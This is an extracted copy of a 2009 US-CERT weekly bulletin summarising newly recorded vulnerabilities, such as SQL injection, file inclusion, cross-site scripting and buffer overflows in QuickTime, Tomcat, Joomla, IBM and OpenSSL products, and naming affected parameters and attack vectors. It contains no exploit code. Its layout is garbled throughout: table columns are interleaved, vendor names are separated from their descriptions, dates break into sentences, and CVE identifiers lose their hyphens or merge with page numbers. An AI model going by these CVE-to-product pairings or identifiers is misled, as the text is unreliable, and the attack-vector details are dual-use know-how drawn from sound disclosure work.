US-CERT Cyber Security Bulletin SB09-159 -- Vulnerability Summary for the Week of June 1, 2009

1/19/10 10:40 AM

National Cyber Alert System
Cyber Security Bulletin SB09-159
Vulnerability Summary for the Week of June 1, 2009
The US-CERT Cyber Security Bulletin provides a summary of new vulnerabilities that have been recorded by the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) in the past week. The NVD is sponsored by the Department of Homeland Security (DHS) National Cyber Security Division (NCSD) / United States Computer Emergency Readiness Team (US-CERT). For modified or updated entries, please visit the NVD, which contains historical vulnerability information. The vulnerabilities are based on the CVE vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division of high, medium, and low severities correspond to the following scores: High - Vulnerabilities will be labeled High severity if they have a CVSS base score of 7.0 - 10.0 Medium - Vulnerabilities will be labeled Medium severity if they have a CVSS base score of 4.0 - 6.9 Low - Vulnerabilities will be labeled Low severity if they have a CVSS base score of 0.0 - 3.9 Entries may include additional information provided by organizations and efforts sponsored by US-CERT. This information may include identifying information, values, definitions, and related links. Patch information is provided when available. Please note that some of the information in the bulletins is compiled from external, open source reports and is not a direct result of US-CERT analysis.
High Vulnerabilities Primary Vendor -- Product Description Published CVSS Source & Score Patch Info CVE-20086826 XF BID MILW0RM SECUNIA OSVDB CVE-20086824 BUGTRAQ MISC CVE-20091950 MILW0RM SECUNIA CVE-20091944 MISC XF MILW0RM SECUNIA OSVDB CVE-20090185 VUPEN CONFIRM APPLE CVE-20090188

Page 1 of 12

.mhfmedia -- ads_pro
dhtml.pl in MHF Media Pro allows remote attackers to execute arbitrary commands via shell metacharacters in the page parameter, as demonstrated using the (1) advert_top.htm or (2) advert_login.htm pages. The management interface on the A-LINK WL54AP3 and WL54AP2 access points has a blank default password for the admin account, which makes it easier for remote attackers to obtain access. SQL injection vulnerability in yorum.asp in WebEyes Guest Book 3 allows remote attackers to execute arbitrary SQL commands via the mesajid parameter.

2009-0608

a-link -- wl54ap2 a-link -- wl54ap3

2009-0604

ahmet_donmez -webeyes_guest_book

2009-0605

aimp -- aimp
Stack-based buffer overflow in AIMP 2.51 build 330 allows remote attackers to execute arbitrary code via an MP3 file with a long ID3 tag.

apple -- quicktime

Heap-based buffer overflow in Apple QuickTime before 7.6.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via crafted MS ADPCM encoded audio data in an AVI movie file. Apple QuickTime before 7.6.2 allows remote attackers to

2009-0602

http://www.preview.us-cert.gov/cas/bulletins/SB09-159.html
execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted movie composed of a Sorenson 3 video file. Stack-based buffer overflow in Apple iTunes before 8.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an itms: URL with a long URL component after a colon. Heap-based buffer overflow in Apple QuickTime before 7.6.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted FLC compression file. Buffer overflow in Apple QuickTime before 7.6.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted compressed PSD image. Heap-based buffer overflow in Apple QuickTime before 7.6.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PICT image. Heap-based buffer overflow in Apple QuickTime before 7.6.2 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a movie file containing crafted Clipping Region (CRGN) atom types. Apple QuickTime before 7.6.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via crafted image description atoms in an Apple video file, related to a "sign extension issue." Apple QuickTime before 7.6.2 does not properly initialize memory before use in handling movie files, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a movie containing a user data atom of size zero. Heap-based buffer overflow in Apple QuickTime before 7.6.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted JP2 image. Ascad Networks Password Protector SD 1.3.1 allows remote attackers to bypass authentication and gain administrative access by setting the (1) c7portal and (2) cookname cookies to "admin." Multiple SQL injection vulnerabilities in main/mySpace/myStudents.php in Dokeos 1.8.5, and possibly earlier, allow remote attackers to execute arbitrary SQL commands via the (1) student and (2) course parameters, a different vector than CVE-20072902. inc/init.php in DokuWiki 2009-02-14, rc2009-02-06, and rc2009-01-30, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via the config_cascade[main][default][] parameter to doku.php. NOTE: PHP remote file inclusion is also possible in PHP 5 using ftp:// URLs.

0188 VUPEN CONFIRM APPLE CVE-20090950 VUPEN BID CONFIRM APPLE CVE-20090951 VUPEN CONFIRM CVE-20090952 VUPEN CONFIRM CVE-20090953 VUPEN CONFIRM CVE-20090954 VUPEN BID CONFIRM APPLE CVE-20090955 VUPEN BID CONFIRM CVE-20090956 VUPEN BID CONFIRM APPLE CVE-20090957 VUPEN BID CONFIRM APPLE CVE-20092003 BID MILW0RM CVE-20092004 VUPEN CONFIRM

apple -- itunes

ascadnetworks -password_protector_sd

dokeos -- dokeos

dokuwiki -- dokuwiki

2009-0607

CVE-20091960 CONFIRM CVE-2009-

Page 2 of 12

gscripts -- dns_tools
dig.php in GScripts.net DNS Tools allows remote attackers to execute arbitrary commands via shell metacharacters in the ns parameter. Buffer overflow in the queue manager in IBM WebSphere MQ 6.x before 6.0.2.7 and 7.x before 7.0.1.0 allows remote attackers to execute arbitrary code via a crafted request.
1916 BID MILW0RM SECUNIA CVE-20090896 VUPEN CONFIRM CVE-20091899 VUPEN CVE-20091901 VUPEN CONFIRM CVE-20086820 CONFIRM AIXAPAR AIXAPAR AIXAPAR CONFIRM CVE-20086821 CONFIRM AIXAPAR AIXAPAR AIXAPAR CONFIRM CVE-20091954 BID CONFIRM CVE-20091882 VUPEN BID SECUNIA OSVDB CONFIRM CONFIRM CVE-20091385 CONFIRM CONFIRM CONFIRM CVE-20091848 BID MILW0RM CVE-20091902 FEDORA CVE-20091903 FEDORA FEDORA

Page 3 of 12

ibm -- websphere_mq

2009-0603

Unspecified vulnerability in the System Management/Repository component in IBM WebSphere ibm -Application Server (WAS) 6.0.2 before 6.0.2.35 has websphere_application_server unknown impact and attack vectors, related to a "security exposure in wsadmin." The Security component in IBM WebSphere Application ibm -Server (WAS) 6.0.2 before 6.0.2.35 permits "nonwebsphere_application_server standard http methods," which has unknown impact and remote attack vectors. The db2fmp process in IBM DBbefore FP17, 9.1 before FP5, and 9.5 before FP2 on Windows runs with "OS privilege," which has unknown impact and attack vectors, a different vulnerability than CVE-2008-3856.

ibm -- db2

Buffer overflow in the DAS server in IBM DBbefore FP17, 9.1 before FP5, and 9.5 before FP2 might allow attackers to execute arbitrary code or cause a denial of service (application crash) via unspecified vectors, a different vulnerability than CVE-2007-3676 and CVE2008-3853. Unspecified vulnerability in portmapper (aka portmap) in IBM AIX 5.3 allows attackers to cause a denial of service (daemon hang) via unknown vectors, related to libtli. Integer overflow in the XMakeImage function in magick/xwindow.c in ImageMagick 6.5.2-8 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted TIFF file, which triggers a buffer overflow. NOTE: some of these details are obtained from third party information. Integer underflow in the e1000_clean_rx_irq function in drivers/net/e1000/e1000_main.c in the e1000 driver in the Linux kernel before 2.6.30-rc8, the e1000e driver in the Linux kernel, and Intel Wired Ethernet (aka e1000) before 7.5.5 allows remote attackers to cause a denial of service (panic) via a crafted frame size. SQL injection vulnerability in the JoomlaMe AgoraGroups (aka AG or com_agoragroup) component 0.3.5.3 for Joomla! allows remote attackers to execute arbitrary SQL commands via the id parameter in a groupdetail action to index.php. The multipart processor in ModSecurity before 2.5.9 allows remote attackers to cause a denial of service (crash) via a multipart form datapost request with a missing part header name, which triggers a NULL pointer dereference. The PDF XSS protection feature in ModSecurity before 2.5.8 allows remote attackers to cause a denial of service (Apache httpd crash) via a request for a PDF file that

ibm -- aix

imagemagick -- imagemagick
intel -- e1000 linux -- kernel
joomlame -- com_agoragroup

2009-0601

modsecurity -- modsecurity
does not use the GET method. Unrestricted file upload vulnerability in uploadp.php in New Earth Programming Team (NEPT) imgupload (aka Image Uploader) 1.0 allows remote attackers to execute arbitrary code by uploading a file with an executable extension and a modified content type, then accessing this file via a direct request, as demonstrated by an upload with an image/jpeg content type. NOTE: some of these details are obtained from third party information.
FEDORA VUPEN CVE-20086822 XF BID MILW0RM SECUNIA OSVDB CVE-20091947 XF BID MILW0RM SECUNIA CVE-20091909 JVN CVE-20091910 XF BID BUGTRAQ MILW0RM SECUNIA CONFIRM CONFIRM CVE-20091943 XF MISC VUPEN SECTRACK BID BUGTRAQ SECUNIA OSVDB CVE-20091945 XF MILW0RM CVE-20091949 XF BID MILW0RM

newearthpt -- imguoload

newsboard -unclassified_newsboard
SQL injection vulnerability in the UnbDbEncode function in unb_lib/database.lib.php in Unclassified NewsBoard (UNB) 1.6.4 allows remote attackers to execute arbitrary 2009-06SQL commands via the Query parameter in a search 05 action to forum.php, a different vector than CVE-20053686. SQL injection vulnerability in Skip 1.0.2 and earlier, and 1.1RC2 and earlier 1.1RC versions, allows remote attackers to execute arbitrary SQL commands via unspecified vectors. 2009-0604

openskip -- skip

SQL injection vulnerability in index.php in RTWebalbum rafal_kucharski -- rtwebalbum 1.0.462 allows remote attackers to execute arbitrary SQL commands via the AlbumId parameter.
safenet -- softremote safenet -- softremote1.4
Stack-based buffer overflow in the IKE service (ireIke.exe) in SafeNet SoftRemote before 10.8.6 allows remote attackers to execute arbitrary code via a long request to UDP port 62514.

tzo -- webcal

SQL injection vulnerability in webCal3_detail.asp in WebCal 3.04 allows remote attackers to execute arbitrary SQL commands via the event_id parameter. import_wbb1.php in Unclassified NewsBoard (UNB) 1.6.4 allows remote attackers to obtain sensitive information via a direct request, which reveals the installation path in an error message.
unclassified -- newsboard

xvid -- xvid

Multiple heap-based buffer overflows in xvidcore/src/decoder.c in the xvidcore library in Xvid before 1.2.2, as used by Windows Media Player and other applications, allow remote attackers to execute arbitrary 2009-06code by providing a crafted macroblock (aka MBlock) 02 number in a video stream in a crafted movie file that triggers heap memory corruption, related to a "missing resync marker range check" and the (1) decoder_iframe, (2) decoder_pframe, and (3) decoder_bframe functions. Heap-based buffer overflow in the decoder_create function in the initialization functionality in xvidcore/src/decoder.c in Xvid before 1.2.2, as used by Windows Media Player and other applications, allows remote attackers to execute arbitrary code via vectors involving the DirectShow (aka DShow) frontend and improper handling of the XVID_ERR_MEMORY return

CVE-20090893 CONFIRM

CVE-20090894 CONFIRM CONFIRM

Page 4 of 12

improper handling of the XVID_ERR_MEMORY return code during processing of a crafted movie file. NOTE: some of these details are obtained from third party information. Back to top Medium Vulnerabilities Primary Vendor -- Product Description Multiple cross-site request forgery (CSRF) vulnerabilities in the management interface on the A-LINK WL54AP3 and WL54AP2 access points before firmware 1.4.2-eng1 allow remote attackers to hijack the authentication of administrators for requests that (1) modify the network configuration via certain parameters to goform/formWanTcpipSetup or (2) modify credentials via certain parameters to goform/formPasswordSetup. PHP remote file inclusion vulnerability in latestposts.php in AdaptBB 1.0, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the forumspath parameter. Published

CONFIRM

CVSS Source & Score Patch Info

CVE-20086823 MISC

adaptbb -- adaptbb
CVE-20091946 XF MILW0RM SECUNIA OSVDB CVE-20090033 VUPEN BID CONFIRM CONFIRM CONFIRM CONFIRM CONFIRM CVE-20090580 VUPEN CONFIRM CONFIRM CONFIRM CONFIRM CONFIRM CONFIRM

apache -- tomcat

Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when the Java AJP connector and mod_jk load balancing are used, allows remote attackers to cause a denial of service 2009-06(application outage) via a crafted request with 05 invalid headers, related to temporary blocking of connectors that have encountered errors, as demonstrated by an error involving a malformed HTTP Host header. Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when FORM authentication is used, allows remote attackers to enumerate valid usernames via requests to /j_security_check with malformed URL encoding of passwords, related to improper error checking in the (1) MemoryRealm, (2) DataSourceRealm, and (3) JDBCRealm authentication realms, as demonstrated by a % (percent) value for the j_password parameter.

apache -- apr-util

The apr_strmatch_precompile function in strmatch/apr_strmatch.c in Apache APR-util before 1.3.5 allows remote attackers to cause a denial of service (daemon crash) via crafted input involving (1) a.htaccess file used with the Apache HTTP Server, (2) the 2009-06SVNMasterURI directive in the mod_dav_svn 07 module in the Apache HTTP Server, (3) the mod_apreq2 module for the Apache HTTP Server, or (4) an application that uses the libapreq2 library, related to an "underflow flaw." The expat XML parser in the apr_xml_* interface in xml/apr_xml.c in Apache APRutil before 1.3.7, as used in the mod_dav and mod_dav_svn modules in the Apache HTTP Server, allows remote attackers to cause a

CVE-20090023 CONFIRM DEBIAN

2009-06-

CVE-20091955 DEBIAN

Page 5 of 12

apache -- http_server
denial of service (memory consumption) via a crafted XML document containing a large number of nested entity references, as demonstrated by a PROPFIND request, a similar issue to CVE-2003-1564. Off-by-one error in the apr_brigade_vprintf function in Apache APR-util before 1.3.5 on big-endian platforms allows remote attackers to obtain sensitive information or cause a denial of service (application crash) via crafted input. Integer overflow in Terminal in Apple Mac OS X 10.5 before 10.5.7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted size value in a CSI[4 xterm resize escape sequence that triggers a heap-based buffer overflow. Multiple cross-site scripting (XSS) vulnerabilities in Atlassian JIRA Enterprise Edition 3.13 allow remote attackers to inject arbitrary web script or HTML via the (1) fullname (Full Name) parameter in the ViewProfile page or (2) returnUrl parameter in a form, as demonstrated using secure/AddComment!default.jspa (aka "Add Comment"). Cross-site request forgery (CSRF) vulnerability in Atlassian JIRA Enterprise Edition 3.13 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.

DEBIAN CONFIRM MLIST

CVE-20091956 CONFIRM MLIST CONFIRM CVE-20091717 BID BUGTRAQ CONFIRM SECTRACK
apple -- mac_os_x apple -- mac_os_x_server

atlassian -- jira

CVE-20086831 CONFIRM
CVE-20086832 XF BID SECUNIA OSVDB CVE-20091162 SECTRACK BID CONFIRM SECUNIA CVE-20086830 VUPEN CONFIRM OSVDB
cisco -ironport_email_security_appliances cisco -- ironport_asyncos
Cross-site scripting (XSS) vulnerability in the Spam Quarantine login page in Cisco IronPort AsyncOS before 6.5.2 on Series C, M, and X 2009-06appliances allows remote attackers to inject 05 arbitrary web script or HTML via the referrer parameter. The disconnection feature in Citrix Web Interface 5.0 and 5.0.1 for Java Application Servers does not properly terminate a user's web interface session, which allows attackers with access to the same browser instance to gain access to the user's Web Interface session. NOTE: the attacker must also have valid credentials to the Web Interface. Cross-site scripting (XSS) vulnerability in claroline/linker/notfound.php in Claroline 1.8.11 allows remote attackers to inject arbitrary web script or HTML via the Referer HTTP header.

citrix -- web_interface

claroline -- claroline

CVE-20091907 BID CONFIRM

claudio_klingler -- quixplorer tinywebgallery -- tinywebgallery
Directory traversal vulnerability in.include/init.php (aka admin/_include/init.php) in QuiXplorer 2.3.2 and earlier, as used in TinyWebGallery (TWG) 2009-061.7.6 and earlier, allows remote attackers to 04 include and execute arbitrary local files via a. (dot dot) in the lang parameter to admin/index.php. _functions.php in cpCommerce 1.2.x, possibly including 1.2.9, sends a redirect but does not

CVE-20091911 BID

Page 6 of 12

cpcommerce -- cpcommerce

exit when it is called directly, which allows remote attackers to bypass a protection mechanism to conduct remote file inclusion and directory traversal attacks, ro execute arbitrary PHP code or read arbitrary files, via the GLOBALS[prefix] parameter, a different vector than CVE-2003-1500. Cross-site request forgery (CSRF) vulnerability in Dokeos 1.8.5, and possibly earlier, allows remote attackers to hijack the authentication of unspecified victims and add new personal agenda items via unknown vectors.
CVE-20091936 MILW0RM SECUNIA
CVE-20092005 VUPEN CONFIRM
Multiple directory traversal vulnerabilities in Dokeos 1.8.5, and possibly earlier, allow remote attackers to (1) read portions of arbitrary files via a. (dot dot) and a.\ (dot 2009-06dot backslash) in the lang parameter to 08 main/exercice/hotspot_lang_conversion.php and (2) read arbitrary files via a. (dot dot) in the doc_url parameter to main/exercice/Hpdownload.php. Multiple SQL injection vulnerabilities in Dokeos 1.8.5, and possibly earlier, allow remote attackers to execute arbitrary SQL commands via the (1) uInfo parameter to main/tracking/userLog.php and the (2) course parameter to main/mySpace/lp_tracking.php, a different vector than CVE-2009-2006.2. Multiple cross-site scripting (XSS) vulnerabilities in Dokeos 1.8.5, and possibly earlier, allow remote attackers to inject arbitrary web script or HTML via the (1) curdirpath parameter to main/document/slideshow.php and the (2) file parameter to main/exercice/testheaderpage.php. Multiple integer overflows in the (1) user_info_callback, (2) user_endrow_callback, and (3) gst_pngdec_task functions (ext/libpng/gstpngdec.c) in GStreamer Good Plug-ins (aka gst-plugins-good or gstreamerplugins-good) 0.10.15 allow remote attackers to cause a denial of service and possibly execute arbitrary code via a crafted PNG file, which triggers a buffer overflow. Multiple SQL injection vulnerabilities in Haudenschilt Family Connections CMS (FCMS) 1.9 and earlier allow remote authenticated users to execute arbitrary SQL commands via the (1) thread parameter to messageboard.php, (2) member parameter to profile.php, (3) pid parameter to gallery/index.php, and the (4) fcms_login_id cookie parameter.

CVE-20092007 VUPEN CONFIRM
CVE-20092008 VUPEN CONFIRM
CVE-20092009 VUPEN CONFIRM
gstreamer -- good_plug-ins
CVE-20091932 BID SECUNIA OSVDB CONFIRM
haudenschilt -- family_connections_cms
CVE-20092010 VUPEN BID BUGTRAQ MILW0RM SECUNIA CVE-20091419 HP HP
Unspecified vulnerability in HP Discovery & Dependency Mapping Inventory (DDMI) hp -2.0.0 through 2.52, 7.50, and 7.51 on discovery&dependency_mapping_inventory Windows allows remote attackers to access DDMI agents via unknown vectors. IBM WebSphere Application Server (WAS)

Page 7 of 12

ibm -- intregrated_solutions_console ibm -- websphere_application_server ibm -- websphere_portal
6.1 through 6.1.0.24 and 7.0 through 7.0.0.4, IBM WebSphere Portal Server 5.1 through 6.0, and IBM Integrated Solutions Console (ISC) 6.0.1 do not properly set the IsSecurityEnabled security flag during migration of WebSphere Member Manager (WMM) to Virtual Member Manager (VMM) and a Federated Repository, which allows attackers to obtain sensitive information from repositories via unspecified vectors. The secure login page in the Administrative Console component in IBM WebSphere Application Server (WAS) 6.0.2 before 6.0.2.35 does not redirect to an https page upon receiving an http request, which makes it easier for remote attackers to read the contents of WAS sessions by sniffing the network. The Configservice APIs in the Administrative Console component in IBM WebSphere Application Server (WAS) 6.0.2 before 6.0.2.35 allow attackers to obtain sensitive information via unspecified vectors. IBM DBbefore FP17, 9.1 before FP5, and 9.5 before FP2 provides an INSTALL_JAR (aka sqlj.install_jar) procedure, which allows remote authenticated users to create or overwrite arbitrary files via unspecified calls.

CVE-20090899 CONFIRM

ibm -- websphere_application_server
CVE-20091898 VUPEN CONFIRM
CVE-20091900 VUPEN CONFIRM CVE-20082154 CONFIRM AIXAPAR AIXAPAR CONFIRM CVE-20091906 CONFIRM AIXAPAR AIXAPAR
The DRDA Services component in IBM DB2 9.1 before FP7 and 9.5 before FP4 allows remote attackers to cause a denial of service (memory corruption and application crash) 2009-06via an IPv6 address in the correlation token in 03 the APPID string, as demonstrated by an APPID string sent by the third-party DataDirect JDBC driver 3.7.32. IBM FileNet Content Manager 4.0, 4.0.1, and 4.5, as used in IBM WebSphere Application Server (WAS) and Oracle BEA WebLogic Application Server, when the CE Web Services listener has a certain WSEAF configuration, 2009-06does not properly restrict use of a cached 07 Subject, which allows remote attackers to obtain access with the credentials of a recently authenticated user via unspecified vectors. Stack-based buffer overflow in the URL Search Hook (ICQToolBar.dll) in ICQ 6.5 allows remote attackers to cause a denial of service (persistent crash) and possibly execute 2009-06arbitrary code via an Internet shortcut.URL 04 file containing a long URL parameter, which triggers a crash when browsing a folder that contains this file. Off-by-one error in the event_wallops function in fe-common/irc/fe-events.c in irssi 0.8.13 allows remote IRC servers to cause a denial of service (crash) via an empty command, which triggers a one-byte buffer under-read and a one-byte buffer underflow. Cross-site scripting (XSS) vulnerability in Joomla! 1.5.x through 1.5.10 allows remote

ibm -- filenet_content_manager ibm -- websphere_application_server oracle -- weblogic_application_server
CVE-20091953 BID CONFIRM SECUNIA

icq -- icq

CVE-20091915 XF BID BUGTRAQ MILW0RM CVE-20091959 MISC MLIST CONFIRM CONFIRM CVE-2009Page 8 of 12

irssi -- irssi

joomla -- joomla
attackers to inject arbitrary web script or HTML via unspecified vectors related to database output and the frontend administrative panel. Cross-site scripting (XSS) vulnerability in the JA_Purity template for Joomla! 1.5.x through 1.5.10 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. Cross-site scripting (XSS) vulnerability in the administrator panel in the com_users core component for Joomla! 1.5.x through 1.5.10 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
CVE-20091938 BID CVE-20091939 XF BID SECUNIA OSVDB CONFIRM CVE-20091940 BID OSVDB CONFIRM

joomla -- ja_purity

lightneasy -- lightneasy
Cross-site scripting (XSS) vulnerability in the comment posting feature in LightNEasy 2.2.1 "no database" (aka flat) and 2.2.2 SQLite allows remote attackers to inject arbitrary web script or HTML via the (1) 2009-06commentname (aka Author), (2) 05 commentemail (aka Email), and (3) commentmessage (aka Comment) parameters. NOTE: some of these details are obtained from third party information. The pci_register_iommu_region function in arch/sparc/kernel/pci_common.c in the Linux kernel before 2.6.29 on the sparc64 platform allows local users to cause a denial of service (system crash) by reading the /proc/iomem file, related to uninitialized pointers and the request_resource function. SQL injection vulnerability in manager.php in LuxBum 0.5.5, when magic_quotes_gpc is disabled and dotclear authentication is used, allows remote attackers to execute arbitrary SQL commands via the username parameter in a login action. Cross-site scripting (XSS) vulnerability in MT312 IMG-BBS allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to model.php with a timestamp before 20090521.
CVE-20091937 BID BUGTRAQ SECUNIA MISC

linux -- kernel

CVE-20091914 MLIST CONFIRM CONFIRM CVE-20091913 XF VUPEN BID MILW0RM SECUNIA CVE-20091881 SECUNIA OSVDB JVNDB JVN CVE-20091908 BID SECUNIA CONFIRM JVNDB JVN CONFIRM CVE-20091386 CONFIRM

luxbum -- luxbum

mt312 -- img-bbs
Cross-site scripting (XSS) vulnerability in Skip 1.0.2 and earlier, and 1.1RC2 and earlier 1.1RC versions, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. ssl/s3_pkt.c in OpenSSL before 0.9.8i allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a DTLS ChangeCipherSpec packet that occurs before ClientHello. The dtls1_retrieve_buffered_fragment function in ssl/d1_both.c in OpenSSL before 1.0.0 Beta 2 allows remote attackers to cause a denial of service (NULL pointer dereference
openssl -- openssl openssl_project -- openssl redhat -- openssl
openssl -- openssl openssl_project -- openssl

CVE-20091387 CONFIRM

Page 9 of 12

redhat -- openssl

and daemon crash) via an out-of-sequence DTLS handshake message, related to a "fragment bug." PAD Site Scripts 3.6 stores sensitive information under the web document root with insufficient access control, which allows remote attackers to download the database and obtain sensitive information via a direct request for dbbackup.txt. Cross-site scripting (XSS) vulnerability in index.php in PropertyMax Pro FREE 0.3 allows remote attackers to inject arbitrary web script or HTML via the pl parameter in a mi action.

CONFIRM CONFIRM

phpeasycode -- pad_site_scripts
CVE-20091941 XF MILW0RM CVE-20091951 MILW0RM SECUNIA CVE-20091952 MILW0RM SECUNIA
propertymaxpro -- propertymax_pro_free
Multiple SQL injection vulnerabilities in the administrative login feature in PropertyMax Pro FREE 0.3, when magic_quotes_gpc is 2009-06disabled, allow remote attackers to execute 05 arbitrary SQL commands via the (1) username and (2) password parameters. charon/sa/ike_sa.c in the charon daemon in strongSWAN before 4.3.1 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via an invalid IKE_SA_INIT request that triggers "an incomplete state," followed by a CREATE_CHILD_SA request. charon/sa/tasks/child_create.c in the charon daemon in strongSWAN before 4.3.1 switches the NULL checks for TSi and TSr payloads, which allows remote attackers to cause a denial of service via an IKE_AUTH request without a (1) TSi or (2) TSr traffic selector.

strongswan -- strongswan

CVE-20091957 CONFIRM CONFIRM
CVE-20091958 CONFIRM CONFIRM
sun -- opensolaris sun -- solaris
Kerberos in Sun Solaris 8, 9, and 10, and OpenSolaris before snv_117, does not properly manage credential caches, which allows local 2009-06users to access Kerberized NFS mount points 05 and Kerberized NFS shares via unspecified vectors. Cross-site scripting (XSS) vulnerability in the Reverse Proxy Plug-in in Sun Java System Web Server 6.1 before SP11 allows remote attackers to inject arbitrary web script or HTML via the query string in situations that result in a 502 Gateway error. The ListView control in the Client GUI (AClient.exe) in Symantec Altiris Deployment Solution 6.x before 6.9.355 SP1 allows local users to gain SYSTEM privileges and execute arbitrary commands via a "Shatter" style attack on the "command prompt" hidden GUI button to (1) overwrite the CommandLine parameter to cmd.exe to use SYSTEM privileges and (2) modify the DLL that is loaded using the LoadLibrary API function. Symantec Altiris Deployment Solution 6.x before 6.9.355 SP1 stores the Application Identity Account password in memory in cleartext, which allows local users to gain privileges and modify clients of the Deployment Solution Server. Multiple directory traversal vulnerabilities in forum.php in Unclassified NewsBoard (UNB) 1.6.4, when register_globals is enabled and

CVE-20091933 SUNALERT CONFIRM
sun -- java_system_web_server sun -- one_web_server
CVE-20091934 SUNALERT CONFIRM
symantec -- altiris_deployment_solution symantec -- altiris_notification_server
CVE-20086827 VUPEN CONFIRM MISC
symantec -- altiris_deployment_solution
CVE-20086828 VUPEN CONFIRM

CVE-2009Page 10 of 12

1.6.4, when register_globals is enabled and magic_quotes_gpc is disabled, allow remote attackers to (1) read arbitrary recentlymodified files via a. (dot dot) in the GLOBALS[filename] parameter or (2) include and execute arbitrary local files via a. (dot dot) in the GLOBALS[UTE][__tplCollection][a][file] parameter. VicFTPS 5.0 allows remote attackers to cause a denial of service (crash) via a LIST command that starts with a "/\/" (forward slash, backward slash, forward slash). NOTE: this might be the same issue as CVE-20082031.
CVE-20091948 XF XF BID MILW0RM SECUNIA

vicftps -- vicftps

CVE-20086829 VUPEN MILW0RM
vmware vmware vmware vmware vmware vmware vmware
-- ace -- esx -- esxi -- fusion -- player -- server -- workstation
Unspecified vulnerability in the VMware Descheduled Time Accounting driver in VMware Workstation 6.5.1 and earlier, VMware Player 2.5.1 and earlier, VMware ACE 2.5.1 and earlier, VMware Server 1.x before 1.0.9 build 156507 and 2.x before 2.0.1 2009-06build 156745, VMware Fusion 2.x before 2.0.build 147997, VMware ESXi 3.5, and VMware ESX 3.0.2, 3.0.3, and 3.5, when the Descheduled Time Accounting Service is not running, allows guest OS users on Windows to cause a denial of service via unknown vectors. Directory traversal vulnerability in src/func/language.php in webSPELL 4.2.0e and earlier allows remote attackers to include and execute arbitrary local.php files via a. (dot dot) in a language cookie. NOTE: this can be leveraged for SQL injection by including awards.php. Xfig in Debian GNU/Linux, possibly 3.2.5, allows local users to read and write arbitrary files via a symlink attack on the (1) xfigeps[PID], (2) xfig-pic[PID].pix, (3) xfigpic[PID].err, (4) xfig-pcx[PID].pix, (5) xfigxfigrc[PID], (6) xfig[PID], (7) xfig-print[PID], (8) xfig-export[PID].err, (9) xfig-batch[PID], (10) xfig-exp[PID], or (11) xfig-spell.[PID] temporary files, where [PID] is a process ID.

CVE-20091805 CONFIRM

webspell -- webspell
CVE-20091912 CONFIRM CONFIRM CONFIRM BID OSVDB
xfig -- xfig debian -- debian_linux
CVE-20091962 XF BID MLIST
Back to top Low Vulnerabilities Primary Vendor -- Product Description Published CVSS Source & Score Patch Info CVE-20090783 CONFIRM BUGTRAQ CONFIRM CONFIRM CONFIRM CONFIRM CONFIRM CONFIRM CONFIRM CONFIRM
Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application.

2009-06-05

Multiple cross-site scripting (XSS) vulnerabilities in Dokeos 1.8.5, and possibly earlier, allow remote attackers to inject arbitrary web script or HTML via the (1) search_term

Page 11 of 12

parameter to main/auth/courses.php; the (2) frm_title and (3) frm_content parameters in a new personal agenda item 2009-06-08 action; the (4) title and (5) tutor_name parameters in a new course action; and the (6) student and (7) course parameters to main/mySpace/myStudents.php. NOTE: vectors 2 and 3 might only be exploitable via a separate CSRF vulnerability. Multiple cross-site scripting (XSS) vulnerabilities in Drupal 5.x before 5.18 and 6.x before 6.12 allow (1) remote authenticated users to inject arbitrary web script or HTML via crafted UTF-8 byte sequences that are treated as UTF-7 by Internet Explorer 6 and 7, which are not properly handled in the "HTML exports of books" feature; and (2) allow remote authenticated users with administer taxonomy permissions to inject arbitrary web script or HTML via the help text of an arbitrary vocabulary. NOTE: vector 1 exists because of an incomplete fix for CVE-2009-1575. Cross-site scripting (XSS) vulnerability in the Quiz module 5.x, 6.x-2.x before 6.x-2.2, and 6.x-3.x before 6.x-3.0, a module for Drupal, allows remote authenticated users, with create quizzes or quiz questions access, to inject arbitrary web script or HTML via unspecified vectors.
CVE-20092006 VUPEN CONFIRM

drupal -- drupal

2009-06-01

CVE-20091844 CONFIRM

drupal -- quiz
CVE-20091942 BID OSVDB CONFIRM CONFIRM CVE-20091905 CONFIRM CONFIRM CONFIRM AIXAPAR AIXAPAR AIXAPAR CONFIRM CVE-20091961 MLIST MLIST CONFIRM CVE-20086825 XF BID MILW0RM OSVDB FULLDISC

